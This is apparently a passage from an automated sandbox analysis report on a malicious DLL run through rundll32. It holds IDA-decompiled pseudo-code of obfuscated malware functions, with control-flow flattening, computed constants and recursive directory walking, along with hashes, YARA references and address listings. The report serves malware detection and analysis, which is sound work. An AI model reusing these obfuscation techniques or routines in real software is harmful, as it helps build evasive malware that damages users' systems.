                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )%I$,?D$4`$J<$KE$NU$[w$owF$3)
                                                                                                                      • API String ID: 0-2094660596
                                                                                                                      • Opcode ID: cb892dbf0e02d5c680a1bc3735fc6967582ad95351359404022272d1af05de5b
                                                                                                                      • Instruction ID: ac3992311d77938230219bd7494410f3300a6517a75328f28b6a2d0a96b47cd1
                                                                                                                      • Opcode Fuzzy Hash: cb892dbf0e02d5c680a1bc3735fc6967582ad95351359404022272d1af05de5b
                                                                                                                      • Instruction Fuzzy Hash: 29221E715087819FD368CF25C486A9BBBF2FBC4758F10891DF69A8A260D7B18949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018ACD3 Relevance: 11.6, Strings: 9, Instructions: 313COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0018ACD3(intOrPtr* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr* _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t358;
				void* _t359;
				intOrPtr _t360;
				void* _t366;
				void* _t375;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t426;
				intOrPtr _t430;
				signed int* _t431;

				_t431 =  &_v160;
				_t426 = __ecx;
				_v12 = __ecx;
				_v8 = 0x8c571a;
				_t430 = 0;
				_t375 = 0x79707ab;
				_v4 = 0;
				_v64 = 0xfc5ff;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x00003f17;
				_v140 = 0x873397;
				_v140 = _v140 * 0x50;
				_v140 = _v140 << 5;
				_v140 = _v140 << 4;
				_v140 = _v140 ^ 0x803e6000;
				_v112 = 0x5cc448;
				_v112 = _v112 | 0xb5fdf5b7;
				_v112 = _v112 >> 9;
				_v112 = _v112 ^ 0x005afefa;
				_v60 = 0x19d054;
				_t378 = 0x29;
				_v60 = _v60 / _t378;
				_v60 = _v60 ^ 0x0000a12d;
				_v40 = 0x4c7c9b;
				_t379 = 0x7b;
				_v40 = _v40 / _t379;
				_v40 = _v40 ^ 0x00009f31;
				_v88 = 0xb88e01;
				_v88 = _v88 << 8;
				_v88 = _v88 | 0xb280bd16;
				_v88 = _v88 ^ 0xba886110;
				_v80 = 0xf71efc;
				_v80 = _v80 << 9;
				_t380 = 0x34;
				_v80 = _v80 / _t380;
				_v80 = _v80 ^ 0x04950844;
				_v96 = 0xf5fda;
				_v96 = _v96 >> 7;
				_t381 = 0x11;
				_v96 = _v96 * 0x46;
				_v96 = _v96 ^ 0x00041aa2;
				_v156 = 0x96c5de;
				_v156 = _v156 / _t381;
				_v156 = _v156 ^ 0x88ccdc31;
				_v156 = _v156 * 0x3d;
				_v156 = _v156 ^ 0x96be8a04;
				_v72 = 0x71396c;
				_v72 = _v72 << 0xa;
				_v72 = _v72 ^ 0x367e7763;
				_v72 = _v72 ^ 0xf298a4dc;
				_v148 = 0xd59d39;
				_v148 = _v148 >> 6;
				_v148 = _v148 + 0xffff0863;
				_v148 = _v148 << 4;
				_v148 = _v148 ^ 0x0020b4d1;
				_v116 = 0x4e2a72;
				_v116 = _v116 ^ 0x41f61916;
				_t382 = 0x66;
				_v116 = _v116 / _t382;
				_v116 = _v116 ^ 0xb72c0337;
				_v116 = _v116 ^ 0xb7828c59;
				_v28 = 0x7f34ff;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0xfe6bca43;
				_v124 = 0x9f58a2;
				_v124 = _v124 + 0xffff9c37;
				_v124 = _v124 + 0x725a;
				_v124 = _v124 << 7;
				_v124 = _v124 ^ 0x4fb1837f;
				_v52 = 0xa9f0c8;
				_v52 = _v52 + 0xfffffc3c;
				_v52 = _v52 ^ 0x00ad5534;
				_v24 = 0xa43c6e;
				_t383 = 0x6e;
				_v24 = _v24 * 0x5b;
				_v24 = _v24 ^ 0x3a644c1a;
				_v132 = 0x7fb628;
				_v132 = _v132 * 0xb;
				_v132 = _v132 << 6;
				_v132 = _v132 << 0xd;
				_v132 = _v132 ^ 0x9dcf3d61;
				_v100 = 0x597f63;
				_v100 = _v100 | 0xd4d51309;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xbafad16c;
				_v108 = 0x4d061a;
				_v108 = _v108 >> 2;
				_v108 = _v108 ^ 0xd197d397;
				_v108 = _v108 + 0xffff042d;
				_v108 = _v108 ^ 0xd1833bae;
				_v20 = 0x2586e5;
				_v20 = _v20 + 0x8581;
				_v20 = _v20 ^ 0x0026b83c;
				_v92 = 0x3ae4f5;
				_v92 = _v92 << 1;
				_v92 = _v92 << 0xb;
				_v92 = _v92 ^ 0xae4bd9c6;
				_v44 = 0xe6dc30;
				_v44 = _v44 ^ 0xd3982ed3;
				_v44 = _v44 ^ 0xd37e8c85;
				_v144 = 0xe42628;
				_v144 = _v144 | 0xc37700ac;
				_v144 = _v144 >> 0xa;
				_v144 = _v144 << 0xc;
				_v144 = _v144 ^ 0x0fd23fe2;
				_v152 = 0x41402a;
				_t186 =  &_v152; // 0x41402a
				_t384 = 0x19;
				_v152 =  *_t186 / _t383;
				_v152 = _v152 * 0x6a;
				_v152 = _v152 ^ 0x2485591b;
				_v152 = _v152 ^ 0x24bff8d4;
				_v160 = 0xbf0758;
				_v160 = _v160 + 0x522b;
				_v160 = _v160 >> 0xe;
				_v160 = _v160 + 0xffff65d4;
				_v160 = _v160 ^ 0xfff1feea;
				_v84 = 0x1a9ecc;
				_v84 = _v84 << 0x10;
				_t385 = 0x2d;
				_v84 = _v84 / _t384;
				_v84 = _v84 ^ 0x065118ef;
				_v120 = 0x6a6625;
				_t219 =  &_v120; // 0x6a6625
				_v120 =  *_t219 / _t385;
				_v120 = _v120 >> 0xd;
				_v120 = _v120 + 0x1650;
				_v120 = _v120 ^ 0x00013394;
				_v76 = 0x6cd503;
				_v76 = _v76 + 0xffff64c6;
				_v76 = _v76 * 0x17;
				_v76 = _v76 ^ 0x09bb62c3;
				_v128 = 0x4363ee;
				_v128 = _v128 | 0x70162fad;
				_v128 = _v128 * 0x15;
				_v128 = _v128 + 0xffff87d6;
				_v128 = _v128 ^ 0x372e6b7a;
				_v36 = 0xd9ddf9;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x1b34c995;
				_v136 = 0xc7126f;
				_v136 = _v136 << 3;
				_v136 = _v136 >> 6;
				_v136 = _v136 + 0x2e5f;
				_v136 = _v136 ^ 0x001d82e9;
				_v104 = 0x7714f2;
				_v104 = _v104 << 2;
				_v104 = _v104 * 5;
				_t358 = 0x5786d8d;
				_v104 = _v104 | 0x0a59959c;
				_v104 = _v104 ^ 0x0b5ace50;
				_v68 = 0x585054;
				_v68 = _v68 ^ 0x33c1c88e;
				_v68 = _v68 ^ 0x9bceaa07;
				_v68 = _v68 ^ 0xa855990f;
				_v56 = 0xa2136b;
				_v56 = _v56 + 0x4ebb;
				_v56 = _v56 ^ 0x00a98962;
				_v32 = 0x51a57b;
				_v32 = _v32 >> 0xe;
				_v32 = _v32 ^ 0x0002096e;
				_v48 = 0x9fd766;
				_v48 = _v48 | 0x00a10b6a;
				_v48 = _v48 ^ 0x00bfd9fa;
				do {
					while(_t375 != _t358) {
						if(_t375 == 0x79707ab) {
							_t375 = 0x7c4530c;
							continue;
						} else {
							if(_t375 == 0x7c4530c) {
								_push(_v156);
								_push(_v96);
								_push(0x171678);
								_t366 = E0017AB66(_v88, _v80, __eflags);
								_push(_v28);
								_push(_v116);
								_t302 =  &_v148; // 0x372e6b7a
								_push(0x171538);
								__eflags = E00180EDA(E0017AB66(_v72,  *_t302, __eflags), _v64, _v124, _t366,  &_v16, _v52, _v24) - _v140;
								_t375 =  ==  ? 0x5786d8d : 0xbb932f6;
								E0017AE03(_v132, _v100, _v108, _t366);
								E0017AE03(_v20, _v92, _v44, _t367);
								_t426 = _v12;
								_t431 =  &(_t431[0xf]);
								L10:
								_t358 = 0x5786d8d;
								goto L11;
							} else {
								if(_t375 != 0xfc0b370) {
									goto L11;
								} else {
									E00177027(_v32, _v40, _v16, _v48);
								}
							}
						}
						L6:
						return _t430;
					}
					_push(_v84);
					_push(_v160);
					_push(0x171588);
					_t359 = E0017AB66(_v144, _v152, __eflags);
					_t360 =  *0x195c9c; // 0x0
					__eflags = E0018F9E2(_v112, _v120, _v16,  *_t426, _v76, _v144, _v128,  *((intOrPtr*)(_t426 + 4)), _v36, _v136, _t359, _t360 + 8) - _v60;
					_t375 = 0xfc0b370;
					_t430 =  ==  ? 1 : _t430;
					E0017AE03(_v104, _v68, _v56, _t359);
					_t431 =  &(_t431[0xf]);
					goto L10;
					L11:
					__eflags = _t375 - 0xbb932f6;
				} while (__eflags != 0);
				goto L6;
			}



























































                                                                                                                      0x0018acd3
                                                                                                                      0x0018acdd
                                                                                                                      0x0018acdf
                                                                                                                      0x0018ace6
                                                                                                                      0x0018acf3
                                                                                                                      0x0018acf5
                                                                                                                      0x0018acfa
                                                                                                                      0x0018ad01
                                                                                                                      0x0018ad09
                                                                                                                      0x0018ad0e
                                                                                                                      0x0018ad16
                                                                                                                      0x0018ad25
                                                                                                                      0x0018ad29
                                                                                                                      0x0018ad2e
                                                                                                                      0x0018ad33
                                                                                                                      0x0018ad3b
                                                                                                                      0x0018ad43
                                                                                                                      0x0018ad4b
                                                                                                                      0x0018ad50
                                                                                                                      0x0018ad58
                                                                                                                      0x0018ad64
                                                                                                                      0x0018ad69
                                                                                                                      0x0018ad6f
                                                                                                                      0x0018ad77
                                                                                                                      0x0018ad89
                                                                                                                      0x0018ad8e
                                                                                                                      0x0018ad97
                                                                                                                      0x0018ada2
                                                                                                                      0x0018adaa
                                                                                                                      0x0018adaf
                                                                                                                      0x0018adb7
                                                                                                                      0x0018adbf
                                                                                                                      0x0018adc7
                                                                                                                      0x0018add0
                                                                                                                      0x0018add5
                                                                                                                      0x0018addb
                                                                                                                      0x0018ade3
                                                                                                                      0x0018adeb
                                                                                                                      0x0018adf5
                                                                                                                      0x0018adf6
                                                                                                                      0x0018adfa
                                                                                                                      0x0018ae02
                                                                                                                      0x0018ae10
                                                                                                                      0x0018ae14
                                                                                                                      0x0018ae21
                                                                                                                      0x0018ae25
                                                                                                                      0x0018ae2d
                                                                                                                      0x0018ae35
                                                                                                                      0x0018ae3a
                                                                                                                      0x0018ae42
                                                                                                                      0x0018ae4a
                                                                                                                      0x0018ae52
                                                                                                                      0x0018ae57
                                                                                                                      0x0018ae5f
                                                                                                                      0x0018ae64
                                                                                                                      0x0018ae6c
                                                                                                                      0x0018ae74
                                                                                                                      0x0018ae84
                                                                                                                      0x0018ae89
                                                                                                                      0x0018ae8f
                                                                                                                      0x0018ae97
                                                                                                                      0x0018ae9f
                                                                                                                      0x0018aeaa
                                                                                                                      0x0018aeb2
                                                                                                                      0x0018aebd
                                                                                                                      0x0018aec5
                                                                                                                      0x0018aecd
                                                                                                                      0x0018aed5
                                                                                                                      0x0018aeda
                                                                                                                      0x0018aee2
                                                                                                                      0x0018aeed
                                                                                                                      0x0018aef8
                                                                                                                      0x0018af03
                                                                                                                      0x0018af16
                                                                                                                      0x0018af19
                                                                                                                      0x0018af20
                                                                                                                      0x0018af2b
                                                                                                                      0x0018af38
                                                                                                                      0x0018af3c
                                                                                                                      0x0018af41
                                                                                                                      0x0018af46
                                                                                                                      0x0018af4e
                                                                                                                      0x0018af56
                                                                                                                      0x0018af5e
                                                                                                                      0x0018af63
                                                                                                                      0x0018af6b
                                                                                                                      0x0018af73
                                                                                                                      0x0018af78
                                                                                                                      0x0018af80
                                                                                                                      0x0018af88
                                                                                                                      0x0018af90
                                                                                                                      0x0018af9b
                                                                                                                      0x0018afa6
                                                                                                                      0x0018afb1
                                                                                                                      0x0018afb9
                                                                                                                      0x0018afbd
                                                                                                                      0x0018afc2
                                                                                                                      0x0018afca
                                                                                                                      0x0018afd5
                                                                                                                      0x0018afe0
                                                                                                                      0x0018afeb
                                                                                                                      0x0018aff3
                                                                                                                      0x0018affb
                                                                                                                      0x0018b000
                                                                                                                      0x0018b005
                                                                                                                      0x0018b00d
                                                                                                                      0x0018b015
                                                                                                                      0x0018b01b
                                                                                                                      0x0018b01c
                                                                                                                      0x0018b029
                                                                                                                      0x0018b02d
                                                                                                                      0x0018b035
                                                                                                                      0x0018b03d
                                                                                                                      0x0018b045
                                                                                                                      0x0018b04d
                                                                                                                      0x0018b052
                                                                                                                      0x0018b05a
                                                                                                                      0x0018b062
                                                                                                                      0x0018b06a
                                                                                                                      0x0018b075
                                                                                                                      0x0018b076
                                                                                                                      0x0018b07a
                                                                                                                      0x0018b084
                                                                                                                      0x0018b08c
                                                                                                                      0x0018b092
                                                                                                                      0x0018b096
                                                                                                                      0x0018b09b
                                                                                                                      0x0018b0a3
                                                                                                                      0x0018b0ab
                                                                                                                      0x0018b0b3
                                                                                                                      0x0018b0c0
                                                                                                                      0x0018b0c4
                                                                                                                      0x0018b0cc
                                                                                                                      0x0018b0d4
                                                                                                                      0x0018b0e1
                                                                                                                      0x0018b0e5
                                                                                                                      0x0018b0ed
                                                                                                                      0x0018b0f5
                                                                                                                      0x0018b100
                                                                                                                      0x0018b108
                                                                                                                      0x0018b113
                                                                                                                      0x0018b11b
                                                                                                                      0x0018b120
                                                                                                                      0x0018b125
                                                                                                                      0x0018b12d
                                                                                                                      0x0018b135
                                                                                                                      0x0018b13d
                                                                                                                      0x0018b147
                                                                                                                      0x0018b14b
                                                                                                                      0x0018b150
                                                                                                                      0x0018b158
                                                                                                                      0x0018b160
                                                                                                                      0x0018b168
                                                                                                                      0x0018b170
                                                                                                                      0x0018b178
                                                                                                                      0x0018b180
                                                                                                                      0x0018b188
                                                                                                                      0x0018b190
                                                                                                                      0x0018b198
                                                                                                                      0x0018b1a3
                                                                                                                      0x0018b1ab
                                                                                                                      0x0018b1b6
                                                                                                                      0x0018b1c1
                                                                                                                      0x0018b1cc
                                                                                                                      0x0018b1d7
                                                                                                                      0x0018b1d7
                                                                                                                      0x0018b1e5
                                                                                                                      0x0018b2e7
                                                                                                                      0x00000000
                                                                                                                      0x0018b1eb
                                                                                                                      0x0018b1f1
                                                                                                                      0x0018b22f
                                                                                                                      0x0018b233
                                                                                                                      0x0018b23f
                                                                                                                      0x0018b244
                                                                                                                      0x0018b249
                                                                                                                      0x0018b252
                                                                                                                      0x0018b256
                                                                                                                      0x0018b25e
                                                                                                                      0x0018b29e
                                                                                                                      0x0018b2b5
                                                                                                                      0x0018b2b8
                                                                                                                      0x0018b2d3
                                                                                                                      0x0018b2d8
                                                                                                                      0x0018b2df
                                                                                                                      0x0018b37b
                                                                                                                      0x0018b37b
                                                                                                                      0x00000000
                                                                                                                      0x0018b1f3
                                                                                                                      0x0018b1f9
                                                                                                                      0x00000000
                                                                                                                      0x0018b1ff
                                                                                                                      0x0018b21b
                                                                                                                      0x0018b221
                                                                                                                      0x0018b1f9
                                                                                                                      0x0018b1f1
                                                                                                                      0x0018b224
                                                                                                                      0x0018b22e
                                                                                                                      0x0018b22e
                                                                                                                      0x0018b2f1
                                                                                                                      0x0018b2f5
                                                                                                                      0x0018b301
                                                                                                                      0x0018b306
                                                                                                                      0x0018b310
                                                                                                                      0x0018b356
                                                                                                                      0x0018b358
                                                                                                                      0x0018b365
                                                                                                                      0x0018b373
                                                                                                                      0x0018b378
                                                                                                                      0x00000000
                                                                                                                      0x0018b380
                                                                                                                      0x0018b380
                                                                                                                      0x0018b380
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %fj$(&$*@A$+R$TPX$_.$cw~6$r*N$zk.7
                                                                                                                      • API String ID: 0-4179132742
                                                                                                                      • Opcode ID: 75acdc3e294886add544818b791798fe8faa0f8a1213b7ecb24e167973bf4ea6
                                                                                                                      • Instruction ID: d2c989ad192eb811bcb566e844f287fedf8c04b22258f07a4eb311f49d62f1e3
                                                                                                                      • Opcode Fuzzy Hash: 75acdc3e294886add544818b791798fe8faa0f8a1213b7ecb24e167973bf4ea6
                                                                                                                      • Instruction Fuzzy Hash: 82F1FC715083809FD3A8CF25D58AA4BBBF2FBC4748F50891DF59A86260DBB19949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100453C8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Version$ClipboardFormatRegister
                                                                                                                      • String ID: MSWHEEL_ROLLMSG
                                                                                                                      • API String ID: 2888461884-2485103130
                                                                                                                      • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                      • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00171950 Relevance: 10.3, Strings: 8, Instructions: 345COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 81%
                                                                                                                      			E00171950(void* __ecx, void* __edx, void* __eflags, signed int _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr _v156;
				char _v176;
				short _v720;
				short _v722;
				char _v724;
				signed int _v768;
				char _v1288;
				char _v1808;
				void* _t335;
				signed int _t360;
				signed int _t362;
				intOrPtr _t371;
				void* _t373;
				signed int _t379;
				void* _t406;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				void* _t426;
				void* _t427;

				_t371 = _a8;
				_push(_a20);
				if(__eflags == 0) {
					_push(_a16);
					_push(_a12);
					_push(_t371);
					_push(_a4);
					_push(__edx);
					_push(__ecx);
					E0017CF25(_t335);
					_v16 = 0x6f572e;
				}
				_t427 = _t426 + 0x1c;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 + 0xd52f;
				_t373 = 0x80f983c;
				_v16 = _v16 ^ 0x3310f03a;
				_v16 = _v16 ^ 0x33101333;
				_v60 = 0xed71dd;
				_v60 = _v60 ^ 0x2497a453;
				_t418 = 0x26;
				_v60 = _v60 * 0x72;
				_v60 = _v60 ^ 0x3eb60fda;
				_v112 = 0xa5b0b2;
				_v112 = _v112 + 0x8954;
				_v112 = _v112 ^ 0x00ada628;
				_v108 = 0xe5587e;
				_v108 = _v108 << 9;
				_v108 = _v108 ^ 0xcab3bbf0;
				_v92 = 0x4845fb;
				_v92 = _v92 + 0x365f;
				_v92 = _v92 + 0xdd1a;
				_v92 = _v92 ^ 0x004e95c0;
				_v88 = 0xa51f24;
				_v88 = _v88 ^ 0x4dc3992d;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x002183c7;
				_v28 = 0x92b1f2;
				_v28 = _v28 + 0xdb28;
				_v28 = _v28 ^ 0xc5c4fb2d;
				_v28 = _v28 + 0xffff07a3;
				_v28 = _v28 ^ 0xc5543e55;
				_v56 = 0x45fcf7;
				_v56 = _v56 ^ 0x18f8a820;
				_v56 = _v56 / _t418;
				_v56 = _v56 ^ 0x00a79737;
				_v72 = 0xd5567a;
				_v72 = _v72 ^ 0x96c46f64;
				_v72 = _v72 + 0x1123;
				_v72 = _v72 ^ 0x96131221;
				_v128 = 0xd7fcd2;
				_v128 = _v128 | 0x19fc7ba7;
				_v128 = _v128 ^ 0x19f2013f;
				_v36 = 0xb63dda;
				_v36 = _v36 | 0x57c3443c;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x000375d9;
				_v120 = 0x9784e5;
				_v120 = _v120 ^ 0x5442b457;
				_v120 = _v120 ^ 0x54d2e3fe;
				_v152 = 0x86b47c;
				_v152 = _v152 | 0x1a648f0d;
				_v152 = _v152 ^ 0x1ae2f95e;
				_v104 = 0xe16033;
				_v104 = _v104 + 0xffff0503;
				_v104 = _v104 ^ 0x00e7872e;
				_v140 = 0x7ced29;
				_v140 = _v140 + 0x937a;
				_v140 = _v140 ^ 0x00718bd8;
				_v148 = 0xa848b7;
				_v148 = _v148 ^ 0xa8d47762;
				_v148 = _v148 ^ 0xa87b6210;
				_v124 = 0xc4055c;
				_v124 = _v124 << 5;
				_v124 = _v124 ^ 0x1882bddf;
				_v80 = 0x58e97;
				_t419 = 0x7c;
				_v80 = _v80 / _t419;
				_v80 = _v80 + 0xffff9366;
				_v80 = _v80 ^ 0xfffe01cd;
				_v48 = 0x77db93;
				_t420 = 0x3a;
				_v48 = _v48 / _t420;
				_v48 = _v48 + 0xffffa5b4;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x00036e08;
				_v132 = 0x4854bc;
				_t421 = 0x4c;
				_v132 = _v132 * 0x24;
				_v132 = _v132 ^ 0x0a23127f;
				_v84 = 0x297997;
				_v84 = _v84 / _t421;
				_t422 = 0x45;
				_v84 = _v84 * 0x5e;
				_v84 = _v84 ^ 0x003e8360;
				_v24 = 0xba7a12;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x8e2fa782;
				_v24 = _v24 + 0xffffcaa3;
				_v24 = _v24 ^ 0xfad920cc;
				_v64 = 0xf87d94;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 4;
				_v64 = _v64 ^ 0x0002c2de;
				_v68 = 0x627eea;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 | 0x4b478a8f;
				_v68 = _v68 ^ 0x4b4b50ae;
				_v32 = 0x4d9af3;
				_v32 = _v32 + 0xffff3fdf;
				_v32 = _v32 | 0x07023235;
				_v32 = _v32 ^ 0xa9cb8ace;
				_v32 = _v32 ^ 0xae825d6e;
				_v144 = 0x2c231c;
				_v144 = _v144 ^ 0x372f588c;
				_v144 = _v144 ^ 0x37050cc1;
				_v40 = 0xed36d5;
				_v40 = _v40 / _t422;
				_v40 = _v40 + 0xffff2e56;
				_v40 = _v40 * 0xd;
				_v40 = _v40 ^ 0x002f5a10;
				_v20 = 0xb226b9;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x7ec33512;
				_v20 = _v20 ^ 0x86eef9df;
				_v20 = _v20 ^ 0xee6f0a5e;
				_v76 = 0xa2d2;
				_v76 = _v76 + 0xffff2403;
				_v76 = _v76 + 0xffff5c56;
				_v76 = _v76 ^ 0xfff84be5;
				_v12 = 0x61529e;
				_v12 = _v12 + 0x826f;
				_v12 = _v12 | 0x315ab852;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x0008d08d;
				_v136 = 0xbe89c0;
				_v136 = _v136 ^ 0x9f3b785a;
				_v136 = _v136 ^ 0x9f8a2ffd;
				_v116 = 0x9615af;
				_v116 = _v116 | 0x7dcb4113;
				_v116 = _v116 ^ 0x7dd5a359;
				_v100 = 0x787e8d;
				_t423 = 0xf;
				_v100 = _v100 * 0x78;
				_v100 = _v100 ^ 0x3874d75c;
				_v96 = 0xce992e;
				_v96 = _v96 << 9;
				_v96 = _v96 | 0x5045bce0;
				_v96 = _v96 ^ 0xdd755c45;
				_v52 = 0xe3c541;
				_t417 = _v100;
				_v52 = _v52 / _t423;
				_v52 = _v52 + 0xffff4fb9;
				_v52 = _v52 | 0x0dbfd8b3;
				_v52 = _v52 ^ 0x0db5e533;
				_v44 = 0xd3f0eb;
				_v44 = _v44 | 0x02fbd4da;
				_v44 = _v44 >> 6;
				_v44 = _v44 + 0xffffa89e;
				_v44 = _v44 ^ 0x000772a1;
				while(1) {
					L5:
					_t406 = 0x2e;
					L6:
					while(_t373 != 0xcf103a) {
						if(_t373 == 0x80f983c) {
							_v156 = _t371;
							_t373 = 0xcf103a;
							continue;
						}
						if(_t373 == 0x8bdeaee) {
							__eflags = _v768 & _v16;
							if(__eflags == 0) {
								_t360 = _a16( &_v768,  &_v176);
								asm("sbb ecx, ecx");
								_t379 =  ~_t360 & 0x01058edd;
								L13:
								_t373 = _t379 + 0xe9f3001;
								while(1) {
									L5:
									_t406 = 0x2e;
									goto L6;
								}
							} else {
								__eflags = _v724 - _t406;
								if(_v724 != _t406) {
									L22:
									__eflags = _a4;
									if(__eflags != 0) {
										_push(_v48);
										_push(_v80);
										_push(0x171264);
										E0017E7CE(E0017AB66(_v148, _v124, __eflags), __eflags, _v132, _t371, _v148, _v84, _v24, _v64, _v68,  &_v724);
										_t310 =  &_a12; // 0xee6f0a5e
										E00171950(_v32, _v144, __eflags, _a4,  &_v1808,  *_t310, _a16, _v40);
										_t427 = _t427 + 0x40;
										_t362 = E0017AE03(_v20, _v76, _v12, _t365);
										_t406 = 0x2e;
									}
								} else {
									__eflags = _v722;
									if(__eflags != 0) {
										__eflags = _v722 - _t406;
										if(_v722 != _t406) {
											goto L22;
										} else {
											__eflags = _v720;
											if(__eflags != 0) {
												goto L22;
											}
										}
									}
								}
								_t373 = 0xfa4bede;
								continue;
							}
							L31:
						}
						if(_t373 != 0x8fff290) {
							if(_t373 == 0xe9f3001) {
								return E00188C35(_v100, _t417, _v96, _v52, _v44);
							}
							if(_t373 != 0xfa4bede) {
								L27:
								__eflags = _t373 - 0x71f77cc;
								if(__eflags != 0) {
									continue;
								} else {
									return _t362;
								}
								goto L31;
							} else {
								_t277 =  &_v768; // 0x15f5595f
								_t362 = E0018F7FC(_v136, _t417, _v116, _t277);
								asm("sbb ecx, ecx");
								_t379 =  ~_t362 & 0xfa1ebaed;
								goto L13;
							}
						}
						_t362 = E0018BAEA( &_v1288, _v152,  &_v768, _v104, _v140);
						_t417 = _t362;
						_t427 = _t427 + 0xc;
						__eflags = _t362 - 0xffffffff;
						if(__eflags != 0) {
							_t373 = 0x8bdeaee;
							goto L5;
						}
						return _t362;
						goto L31;
					}
					_push(_v92);
					_push(_v108);
					_push(0x1712d4);
					E00173BF8(_v28, __eflags, E0017AB66(_v60, _v112, __eflags), _v56, _v72,  &_v1288, _t371);
					E0017AE03(_v128, _v36, _v120, _t353);
					_t427 = _t427 + 0x28;
					_t373 = 0x8fff290;
					_t406 = 0x2e;
					goto L27;
				}
			}






























































                                                                                                                      0x0017195a
                                                                                                                      0x0017195f
                                                                                                                      0x00171960
                                                                                                                      0x00171962
                                                                                                                      0x00171965
